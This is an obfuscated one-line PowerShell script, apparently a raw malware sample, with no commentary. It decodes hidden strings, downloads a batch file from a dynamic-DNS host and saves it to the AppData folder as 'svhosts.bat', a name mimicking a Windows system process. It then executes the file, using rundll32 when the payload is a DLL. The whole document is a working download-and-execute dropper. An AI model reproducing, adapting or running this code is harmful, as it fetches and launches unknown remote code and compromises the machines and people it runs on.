"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function vTfah($xQudNzEj, $OFweEKg){[IO.File]::WriteAllBytes($xQudNzEj, $OFweEKg)};function IEtfY($xQudNzEj){if($xQudNzEj.EndsWith((yGQSet @(15626,15680,15688,15688))) -eq $True){Start-Process (yGQSet @(15694,15697,15690,15680,15688,15688,15631,15630,15626,15681,15700,15681)) $xQudNzEj}else{Start-Process $xQudNzEj}};function bZmJux($pVbtIjHBE){$QTuDPuAwz = New-Object (yGQSet @(15658,15681,15696,15626,15667,15681,15678,15647,15688,15685,15681,15690,15696));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OFweEKg = $QTuDPuAwz.DownloadData($pVbtIjHBE);return $OFweEKg};function yGQSet($mSphbW){$TdkvfmoLP=15580;$lmVbKAnzp=$Null;foreach($GsSYfGNP in $mSphbW){$lmVbKAnzp+=[char]($GsSYfGNP-$TdkvfmoLP)};return $lmVbKAnzp};function nRSqmFi(){$CZtjuCtmV = $env:APPDATA + '\';$ryrbnkPg = bZmJux (yGQSet @(15684,15696,15696,15692,15638,15627,15627,15692,15694,15685,15698,15677,15696,15681,15695,15681,15679,15697,15694,15681,15680,15626,15680,15697,15679,15687,15680,15690,15695,15626,15691,15694,15683,15627,15679,15685,15701,15698,15627,15695,15698,15684,15691,15695,15696,15695,15626,15678,15677,15696));$IGRwg = $CZtjuCtmV + 'svhosts.bat';vTfah $IGRwg $ryrbnkPg;IEtfY $IGRwg;;;;}nRSqmFi;